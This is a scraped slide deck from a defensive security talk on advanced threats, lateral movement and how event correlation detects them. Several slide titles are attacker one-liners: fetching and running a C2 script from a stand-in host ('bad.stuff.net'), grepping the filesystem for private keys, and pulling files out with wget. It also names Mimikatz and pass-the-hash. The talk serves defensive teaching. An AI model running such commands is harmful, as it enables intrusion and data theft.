SlideShare a Scribd company logo

Advanced Threats and Lateral Movement Detection

Greg Foss
Greg Foss

High level slides on attack and defense against 'advanced adversaries.' This is about as close to sales as I'll get, lol.

Technology
1 of 38
Download to read offline
Advanced  Threats  &  Lateral  Movement  Detec5on   Greg  Foss   OSCP,  GAWN,  GPEN,  GWAPT,  GCIH,  CEH   Sr.  Security  Research  Engineer   LogRhythm  Labs  
#  whoami   •  Greg  Foss   •  Sr.  Security  Researcher   •  LogRhythm  Labs  –  Threat  Intel  Team   •  Former  DOE  PenetraEon  Tester   •  Focus  =>  Honeypots,  Incident  Response,  and  Red  Team   •  OSCP,  GAWN,  GPEN,  GWAPT,  GCIH,  CEH,  etc…   2  
#  ls  -­‐lha   IT  Security  Threats   Event  CorrelaEon   DetecEon   DEMO!   1   2   3   4   3  
4  
#  man  [Advanced  Threats]   •  Advanced  Persistent  Threats   •  Organized  Cyber  Crime   •  Hack5vists   •  ‘Cyber  Terrorists’   •  Etc…   •  Able  to  develop  and  uElize  sophisEcated  techniques  in  pursuit  of  their  target  objecEve  from   reconnaissance  to  data  exfiltraEon.   •  Will  leverage  the  full  spectrum  of  aWack  vectors  –  social,  technical,  physical,  etc.   •  Highly  organized,  highly  moEvated,  highly  resourced.       •  Willing  to  invest  significant  Eme  and  resources  to  compromise.   5  
It’s  when,  not  if…   •  Mission  Oriented   •  Persistent  an  Driven   •  PaEent  and  Methodical   •  Focus  on  exponenEal  ROI   •  Emphasis  on  high  IP  value  targets   •  They  will  get  in…   6   Image:  hWp://pos^iles10.naver.net/20120823_137/ahranta1_1345681933371Je4vd_JPEG/Target.jpg  
Iden5fy  a  ‘Hacker’   7  
Ok,  for  real…   •  *Simple…  Correlate  on  odd  network  /  host  ac5vity   •  Use  the  data  at  hand  to  acEvely  detect  anomalies   •  Understand  how  your  organizaEon  will  respond  to  a  breach  /   outage  /  squirrel  affecEng  any  of  the  three  InfoSec  pillars     •  Confiden5ality   •  Integrity   •  Availability   8  
Advanced  Threat  Tac5cs  and  Evasion   •  Threat  actors  of  all  types  move  slowly  and  quietly  over  Eme.   LimiEng  exposure  and  potenEal  for  discovery.   •  Trending  on  enterprise  data  over  Eme  helps  to  build  baselines   that  can  be  used  to  ac5vely  iden5fy  anomalies.   9  
IT  Security  Threats   10  
#  last  &&  echo  ‘How  are  they  geYng  in??’   •  Phishing   •  91%  of  ‘advanced’  aWacks  began  with  a  phishing  email  or   similar  social  engineering  tacEcs.   •  hWp://www.infosecurity-­‐magazine.com/view/29562/91-­‐of-­‐apt-­‐aWacks-­‐ start-­‐with-­‐a-­‐spearphishing-­‐email/     •  2014  Metrics   •  Average  cost  per  breach  =>  $3.5  million   •  15%  Higher  than  the  previous  year   •  hWp://www.ponemon.org/blog/ponemon-­‐insEtute-­‐releases-­‐2014-­‐cost-­‐ of-­‐data-­‐breach-­‐global-­‐analysis     11  
#  last  &&  echo  ‘How  are  they  geYng  in??’   •  Phishing   •  91%  of  ‘advanced’  aWacks  began  with  a  phishing  email  or   similar  social  engineering  tacEcs.   •  hWp://www.infosecurity-­‐magazine.com/view/29562/91-­‐of-­‐apt-­‐aWacks-­‐ start-­‐with-­‐a-­‐spearphishing-­‐email/     •  2014  Metrics   •  Average  cost  per  breach  =>  $3.5  million   •  15%  Higher  than  the  previous  year   •  hWp://www.ponemon.org/blog/ponemon-­‐insEtute-­‐releases-­‐2014-­‐cost-­‐ of-­‐data-­‐breach-­‐global-­‐analysis     12  
#  history  |  more   •  It  only  takes  one…   13  
#  ./searchsploit  ‘client  side’  &&  echo  ‘new  exploits  daily!’   14  
#  cat  [cve-­‐2014-­‐6332]  >>  /var/www/pwn-­‐IE.html   15  
Event  Correla5on  &  Detec5on   16  
Defense  in  Depth   17  
Spear  Phishing   18  
Phishing  Aback  Log  Traces   19  
$  vim  next.sh   •  Maintain  Access…   20   Image:  hWp://www.netresec.com/images/back_door_open_300x200.png  
$  ./next.sh   •  Then?   •  *Nothing…   •  For  a  long  Eme…     •  *not  really*   •  They  have  aWained  a  foothold  and  are  now  your  newest  employees…   21  
$  su  -­‐  root   22  
#  wget  hbp://bad.stuff.net/c2.py  .  &&  ./c2.py   •  Once  infected,  the  beachhead  will  beacon  periodically   23  
Behavioral  Analy5cs   •  Beaconing  Ac5vity  –  Usually  iniEated  over  port  443  or  an  encrypted   tunnel  over  port  80.   •  Can  be  detected  with  a  Firewall  or  Web  Proxy   •  Capability  to  decrypt  SSL  traffic  is  a  huge  plus   •  Behavioral  analy5cs  can  be  uElized  to  differenEate  normal  browsing   acEvity  from  possible  evidence  of  an  infected  host.   •  Using  a  SIEM,  track  the  unique  websites  usually  visited,  and  the  overall   volume  of  normal  web  acEvity,  on  a  per  user  and  a  per  host  basis.   •  Watch  for  significant  changes  over  an  extended  period  of  Eme.   24  
Reconnaissance   •  Ping  sweeps,  service  discovery,  etc.  –  NO   •  Why  make  unnecessary  noise?   •  Instead  =>  access  network  shares,  web  apps,  and  services   •  Passively  gather  informaEon  using  available  resources…   25   Image:  hWp://macheads101.com/pages/pics/download_pics/mac/portscan.png  
Lateral  Movement   •  Dump  Local  System  Hashes   •  Maybe  crack  them,  maybe  it’s  not  even  necessary…   •  Pass  the  Hash  (PtH)   •  Dump  plain  text  passwords   •  Mimikatz  -­‐-­‐  FTW!   •  Act  as  an  internal  employee  -­‐-­‐  use  legiEmate  means  to  access   resources.   26  
Uncovering  Internal  Reconnaissance  and  Pivo5ng   •  Security  OperaEons  Goal  =>  Reduce  MTTD  and  MTTR   •  MTTD  –  Mean  Time  to  Detect   •  MTTR  –  Mean  Time  to  Respond   •  Set  Traps  =>  Honeypot  /  Honey  Token  access   •  Overt  Clues  =>  ModificaEon  of  user  /  file  /  group  permissions  and   pivoEng  evidence   •  Subtle  Clues  =>  VPN  access  from  disparate  geographical  locaEons   •  Missed  Opportuni5es  =>  Once  inside,  they  are  now  an  ‘employee’…   27  
Lateral  Movement  Log  Traces   •  Microsos’s  granular  Event  IdenEficaEon  schema  (EVID)  in   conjuncEon  with  environment  informaEon  provides  analysts   with  plenty  of  informaEon  to  track  aWackers  once  they  have   breached  the  perimeter.   28  
Passive  Data  Extrac5on   •  Well  Poisoning  via  UNC  Paths   •  SMB  Replay   •  Help  Desk  Tickets   •  Responder  –  By  Spider  Labs   •  Keylogging   29  
Passive  Traffic  Analysis   •  Analyze  /  capture  anything   that  comes  across  the  wire.   •  ARP  poison  hosts  of  interest,   take  over  switches/routers,   etc.   30   Image:  hWps://i.chzbgr.com/maxW500/5579525376/h7D009AE4/  
#  grep  –rhi  ‘private  key’  /*  &&  echo  “Iden5fy  Key  Resources”   •  Keys  /  CerEficates  /  Passwords     •  File  Shares  and  Databases   •  Intellectual  Property   •  Domain  Controllers  /  Exchange  /  etc.   •  Business  Leaders  –  CXO,  Director,  VP,  etc.     •  AdministraEve  Assistants   31   Image:  hWp://www.mobilemarkeEngwatch.com/wordpress/wp-­‐content/uploads/2011/07/Top-­‐Secret-­‐Tip-­‐To-­‐Pick-­‐SMS-­‐Keyword.jpeg  
#  wget  hbp://target/files.tgz  &&  echo  “Data  Exfiltra5on”   •  Target  data  idenEfied,  gathered,  and  moved  out  of  the  environment.   •  Data  is  normally  leaked  in  a  ‘hidden’  or  modified  format,  rarely  is  the   actual  document  extracted.   •  Emails  and  Employee  PII   •  Intellectual  Property   •  Trade  Secrets   32   Image:  hWp://www.csee.umbc.edu/wp-­‐content/uploads/2013/04/ex.jpg  
Data  Exfiltra5on  is  Open  Not  ‘Advanced’   33  
Catching  Data  Exfiltra5on   •  Granular  restric5ons  on  sensi5ve  files  and  directories  to  specific   groups  or  individuals,  alert  on  any  abnormal  file  access  /  read  /   write  /  etc.     •  DNS  exfiltra5on  or  someEmes  even  ICMP  Tunneling  in  high  security   environments     •  Non-­‐SSL  over  ports  443  /  8443,  encrypted  TCP  over  ports  80  /  8080   •  Abnormal  web  server  ac5vity,  newly  created  files,  etc.   34  
It  all  comes  down  to  Event  Correla5on   35  
DEMO   36   DEMO  
Closing  Thoughts…   •  Don’t  be  hard  on  the  outside,  sos  and  chewy  on  the  inside…   •  Implement  Layer  3  (network)  SegmentaEon  and  Least  User  Privilege   •  Understand  your  environment  and  log  data  so  that  you  can  accurately   correlate  physical  and  cyber  events   •  Implement  URL  filtering,  stateful  packet  inspecEon,  and  binary  analysis   •  AcEvely  alert  on  and  respond  at  the  earliest  signs  of  lateral  movement  and   reconnaissance  observed  within  your  environment   •  The  earlier  you  can  detect  aWackers  the  beWer…   37  
Thank  You!   38     QUESTIONS?     Greg  Foss   OSCP,  GAWN,  GPEN,  GWAPT,  GCIH,  CEH   Senior  Security  Research  Engineer   Greg.Foss[at]logrhythm.com   @heinzarelli  

Recommended

Lateral Movement by Default
Lateral Movement by DefaultLateral Movement by Default
Lateral Movement by DefaultInnoTech
 
DerbyCon 5 - Tactical Diversion-Driven Defense
DerbyCon 5 - Tactical Diversion-Driven DefenseDerbyCon 5 - Tactical Diversion-Driven Defense
DerbyCon 5 - Tactical Diversion-Driven DefenseGreg Foss
 
Deception Driven Defense - Infragard 2016
Deception Driven Defense - Infragard 2016Deception Driven Defense - Infragard 2016
Deception Driven Defense - Infragard 2016Greg Foss
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Dynamic Population Discovery for Lateral Movement (Using Machine Learning)
Dynamic Population Discovery for Lateral Movement (Using Machine Learning)Dynamic Population Discovery for Lateral Movement (Using Machine Learning)
Dynamic Population Discovery for Lateral Movement (Using Machine Learning)Rod Soto
 
My Keynote from BSidesTampa 2015 (video in description)
My Keynote from BSidesTampa 2015 (video in description)My Keynote from BSidesTampa 2015 (video in description)
My Keynote from BSidesTampa 2015 (video in description)Andrew Case
 
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015 Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015 Lastline, Inc.
 
Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016
Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016
Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016Danny Akacki
 

Recommended

Lateral Movement by Default
Lateral Movement by DefaultLateral Movement by Default
Lateral Movement by DefaultInnoTech
 
DerbyCon 5 - Tactical Diversion-Driven Defense
DerbyCon 5 - Tactical Diversion-Driven DefenseDerbyCon 5 - Tactical Diversion-Driven Defense
DerbyCon 5 - Tactical Diversion-Driven DefenseGreg Foss
 
Deception Driven Defense - Infragard 2016
Deception Driven Defense - Infragard 2016Deception Driven Defense - Infragard 2016
Deception Driven Defense - Infragard 2016Greg Foss
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Dynamic Population Discovery for Lateral Movement (Using Machine Learning)
Dynamic Population Discovery for Lateral Movement (Using Machine Learning)Dynamic Population Discovery for Lateral Movement (Using Machine Learning)
Dynamic Population Discovery for Lateral Movement (Using Machine Learning)Rod Soto
 
My Keynote from BSidesTampa 2015 (video in description)
My Keynote from BSidesTampa 2015 (video in description)My Keynote from BSidesTampa 2015 (video in description)
My Keynote from BSidesTampa 2015 (video in description)Andrew Case
 
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015 Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015 Lastline, Inc.
 
Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016
Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016
Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016Danny Akacki
 
Hunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark ArtsHunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark ArtsSpyglass Security
 
Avoiding the Pitfalls of Hunting - BSides Charm 2016
Avoiding the Pitfalls of Hunting - BSides Charm 2016Avoiding the Pitfalls of Hunting - BSides Charm 2016
Avoiding the Pitfalls of Hunting - BSides Charm 2016Tony Cook
 
Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...
Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...
Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...CODE BLUE
 
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin FalckLuncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin FalckNorth Texas Chapter of the ISSA
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseGreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseAndrew Morris
 
Introduction to Malware - Part 1
Introduction to Malware - Part 1 Introduction to Malware - Part 1
Introduction to Malware - Part 1 Lastline, Inc.
 
TTPs for Threat hunting In Oil Refineries
TTPs for Threat hunting In Oil RefineriesTTPs for Threat hunting In Oil Refineries
TTPs for Threat hunting In Oil RefineriesDragos, Inc.
 
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...Andrew Morris
 
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...MITRE - ATT&CKcon
 
Cyber Threat Hunting Training (CCTHP)
Cyber Threat Hunting Training (CCTHP)Cyber Threat Hunting Training (CCTHP)
Cyber Threat Hunting Training (CCTHP)ENOInstitute
 
Red team Engagement
Red team EngagementRed team Engagement
Red team EngagementIndranil Banerjee
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report Morane Decriem
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkSqrrl
 
UMS Cybersecurity Awareness Seminar: Cybersecurity - Lessons learned from sec...
UMS Cybersecurity Awareness Seminar: Cybersecurity - Lessons learned from sec...UMS Cybersecurity Awareness Seminar: Cybersecurity - Lessons learned from sec...
UMS Cybersecurity Awareness Seminar: Cybersecurity - Lessons learned from sec...APNIC
 
Jim Wojno: Incident Response - No Pain, No Gain!
Jim Wojno: Incident Response - No Pain, No Gain!Jim Wojno: Incident Response - No Pain, No Gain!
Jim Wojno: Incident Response - No Pain, No Gain!centralohioissa
 
How to Build a Successful Incident Response Program
How to Build a Successful Incident Response ProgramHow to Build a Successful Incident Response Program
How to Build a Successful Incident Response ProgramResilient Systems
 
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsUsing GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsAndrew Morris
 
Ransomware ly
Ransomware lyRansomware ly
Ransomware lyLisa Young
 
RTOS on ARM cortex-M platform -draft
RTOS on ARM cortex-M platform -draftRTOS on ARM cortex-M platform -draft
RTOS on ARM cortex-M platform -draftJou Neo
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 

More Related Content

What's hot

Hunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark ArtsHunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark ArtsSpyglass Security
 
Avoiding the Pitfalls of Hunting - BSides Charm 2016
Avoiding the Pitfalls of Hunting - BSides Charm 2016Avoiding the Pitfalls of Hunting - BSides Charm 2016
Avoiding the Pitfalls of Hunting - BSides Charm 2016Tony Cook
 
Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...
Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...
Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...CODE BLUE
 
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin FalckLuncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin FalckNorth Texas Chapter of the ISSA
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseGreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseAndrew Morris
 
Introduction to Malware - Part 1
Introduction to Malware - Part 1 Introduction to Malware - Part 1
Introduction to Malware - Part 1 Lastline, Inc.
 
TTPs for Threat hunting In Oil Refineries
TTPs for Threat hunting In Oil RefineriesTTPs for Threat hunting In Oil Refineries
TTPs for Threat hunting In Oil RefineriesDragos, Inc.
 
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...Andrew Morris
 
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...MITRE - ATT&CKcon
 
Cyber Threat Hunting Training (CCTHP)
Cyber Threat Hunting Training (CCTHP)Cyber Threat Hunting Training (CCTHP)
Cyber Threat Hunting Training (CCTHP)ENOInstitute
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report Morane Decriem
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkSqrrl
 
UMS Cybersecurity Awareness Seminar: Cybersecurity - Lessons learned from sec...
UMS Cybersecurity Awareness Seminar: Cybersecurity - Lessons learned from sec...UMS Cybersecurity Awareness Seminar: Cybersecurity - Lessons learned from sec...
UMS Cybersecurity Awareness Seminar: Cybersecurity - Lessons learned from sec...APNIC
 
Jim Wojno: Incident Response - No Pain, No Gain!
Jim Wojno: Incident Response - No Pain, No Gain!Jim Wojno: Incident Response - No Pain, No Gain!
Jim Wojno: Incident Response - No Pain, No Gain!centralohioissa
 
How to Build a Successful Incident Response Program
How to Build a Successful Incident Response ProgramHow to Build a Successful Incident Response Program
How to Build a Successful Incident Response ProgramResilient Systems
 
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsUsing GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsAndrew Morris
 

What's hot (20)

Hunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark ArtsHunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark Arts
 
Avoiding the Pitfalls of Hunting - BSides Charm 2016
Avoiding the Pitfalls of Hunting - BSides Charm 2016Avoiding the Pitfalls of Hunting - BSides Charm 2016
Avoiding the Pitfalls of Hunting - BSides Charm 2016
 
Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...
Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...
Lessons learned from hundreds of cyber espionage breaches by TT and Ashley - ...
 
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin FalckLuncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat Hunting
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
 
GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseGreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To Noise
 
Introduction to Malware - Part 1
Introduction to Malware - Part 1 Introduction to Malware - Part 1
Introduction to Malware - Part 1
 
TTPs for Threat hunting In Oil Refineries
TTPs for Threat hunting In Oil RefineriesTTPs for Threat hunting In Oil Refineries
TTPs for Threat hunting In Oil Refineries
 
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
 
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
 
Cyber Threat Hunting Training (CCTHP)
Cyber Threat Hunting Training (CCTHP)Cyber Threat Hunting Training (CCTHP)
Cyber Threat Hunting Training (CCTHP)
 
Red team Engagement
Red team EngagementRed team Engagement
Red team Engagement
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your Network
 
UMS Cybersecurity Awareness Seminar: Cybersecurity - Lessons learned from sec...
UMS Cybersecurity Awareness Seminar: Cybersecurity - Lessons learned from sec...UMS Cybersecurity Awareness Seminar: Cybersecurity - Lessons learned from sec...
UMS Cybersecurity Awareness Seminar: Cybersecurity - Lessons learned from sec...
 
Jim Wojno: Incident Response - No Pain, No Gain!
Jim Wojno: Incident Response - No Pain, No Gain!Jim Wojno: Incident Response - No Pain, No Gain!
Jim Wojno: Incident Response - No Pain, No Gain!
 
How to Build a Successful Incident Response Program
How to Build a Successful Incident Response ProgramHow to Build a Successful Incident Response Program
How to Build a Successful Incident Response Program
 
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsUsing GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
 
Ransomware ly
Ransomware lyRansomware ly
Ransomware ly
 

Viewers also liked

RTOS on ARM cortex-M platform -draft
RTOS on ARM cortex-M platform -draftRTOS on ARM cortex-M platform -draft
RTOS on ARM cortex-M platform -draftJou Neo
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Ubuntu 16.04 LTS Security Features
Ubuntu 16.04 LTS Security FeaturesUbuntu 16.04 LTS Security Features
Ubuntu 16.04 LTS Security FeaturesDustin Kirkland
 
Трудовые будни охотника на угрозы
Трудовые будни охотника на угрозыТрудовые будни охотника на угрозы
Трудовые будни охотника на угрозыSergey Soldatov
 
Whitewood entropy and random numbers - owasp - austin - jan 2017
Whitewood entropy and random numbers - owasp - austin - jan 2017Whitewood entropy and random numbers - owasp - austin - jan 2017
Whitewood entropy and random numbers - owasp - austin - jan 2017WhitewoodOWASP
 
Threat hunting as SOC process
Threat hunting as SOC processThreat hunting as SOC process
Threat hunting as SOC processSergey Soldatov
 
Deploying Privileged Access Workstations (PAWs)
Deploying Privileged Access Workstations (PAWs)Deploying Privileged Access Workstations (PAWs)
Deploying Privileged Access Workstations (PAWs)Blue Teamer
 
Terra Bruciata: an open source initiative for software correctness
Terra Bruciata: an open source initiative for software correctnessTerra Bruciata: an open source initiative for software correctness
Terra Bruciata: an open source initiative for software correctnessRiccardo Bernardini
 
PHDays '14 Cracking java pseudo random sequences by egorov & soldatov
PHDays '14 Cracking java pseudo random sequences by egorov & soldatovPHDays '14 Cracking java pseudo random sequences by egorov & soldatov
PHDays '14 Cracking java pseudo random sequences by egorov & soldatovSergey Soldatov
 
Io t security-ameba-ppt
Io t security-ameba-pptIo t security-ameba-ppt
Io t security-ameba-pptJou Neo
 
Threat Intelligence Field of Dreams
Threat Intelligence Field of DreamsThreat Intelligence Field of Dreams
Threat Intelligence Field of DreamsGreg Foss
 
Generalized Elias Schemes for Truly Random Bits
Generalized Elias Schemes for Truly Random BitsGeneralized Elias Schemes for Truly Random Bits
Generalized Elias Schemes for Truly Random BitsRiccardo Bernardini
 
Rtos ameba
Rtos amebaRtos ameba
Rtos amebaJou Neo
 
Kaspersky managed protection
Kaspersky managed protectionKaspersky managed protection
Kaspersky managed protectionSergey Soldatov
 
Very stable PUF based on two mosfet
Very stable PUF based on two mosfetVery stable PUF based on two mosfet
Very stable PUF based on two mosfetRiccardo Bernardini
 
A Very Stable Diode-Based Physically Unclonable Constant
A Very Stable Diode-Based Physically Unclonable ConstantA Very Stable Diode-Based Physically Unclonable Constant
A Very Stable Diode-Based Physically Unclonable ConstantRiccardo Bernardini
 
Physically Unclonable Random Permutations
Physically Unclonable Random PermutationsPhysically Unclonable Random Permutations
Physically Unclonable Random PermutationsRiccardo Bernardini
 

Viewers also liked (20)

RTOS on ARM cortex-M platform -draft
RTOS on ARM cortex-M platform -draftRTOS on ARM cortex-M platform -draft
RTOS on ARM cortex-M platform -draft
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
Two-fet based PUF
Two-fet based PUFTwo-fet based PUF
Two-fet based PUF
 
Dakotacon 2017
Dakotacon 2017Dakotacon 2017
Dakotacon 2017
 
Ubuntu 16.04 LTS Security Features
Ubuntu 16.04 LTS Security FeaturesUbuntu 16.04 LTS Security Features
Ubuntu 16.04 LTS Security Features
 
Трудовые будни охотника на угрозы
Трудовые будни охотника на угрозыТрудовые будни охотника на угрозы
Трудовые будни охотника на угрозы
 
Whitewood entropy and random numbers - owasp - austin - jan 2017
Whitewood entropy and random numbers - owasp - austin - jan 2017Whitewood entropy and random numbers - owasp - austin - jan 2017
Whitewood entropy and random numbers - owasp - austin - jan 2017
 
Threat hunting as SOC process
Threat hunting as SOC processThreat hunting as SOC process
Threat hunting as SOC process
 
Deploying Privileged Access Workstations (PAWs)
Deploying Privileged Access Workstations (PAWs)Deploying Privileged Access Workstations (PAWs)
Deploying Privileged Access Workstations (PAWs)
 
Terra Bruciata: an open source initiative for software correctness
Terra Bruciata: an open source initiative for software correctnessTerra Bruciata: an open source initiative for software correctness
Terra Bruciata: an open source initiative for software correctness
 
PHDays '14 Cracking java pseudo random sequences by egorov & soldatov
PHDays '14 Cracking java pseudo random sequences by egorov & soldatovPHDays '14 Cracking java pseudo random sequences by egorov & soldatov
PHDays '14 Cracking java pseudo random sequences by egorov & soldatov
 
Io t security-ameba-ppt
Io t security-ameba-pptIo t security-ameba-ppt
Io t security-ameba-ppt
 
Threat Intelligence Field of Dreams
Threat Intelligence Field of DreamsThreat Intelligence Field of Dreams
Threat Intelligence Field of Dreams
 
Generalized Elias Schemes for Truly Random Bits
Generalized Elias Schemes for Truly Random BitsGeneralized Elias Schemes for Truly Random Bits
Generalized Elias Schemes for Truly Random Bits
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Rtos ameba
Rtos amebaRtos ameba
Rtos ameba
 
Kaspersky managed protection
Kaspersky managed protectionKaspersky managed protection
Kaspersky managed protection
 
Very stable PUF based on two mosfet
Very stable PUF based on two mosfetVery stable PUF based on two mosfet
Very stable PUF based on two mosfet
 
A Very Stable Diode-Based Physically Unclonable Constant
A Very Stable Diode-Based Physically Unclonable ConstantA Very Stable Diode-Based Physically Unclonable Constant
A Very Stable Diode-Based Physically Unclonable Constant
 
Physically Unclonable Random Permutations
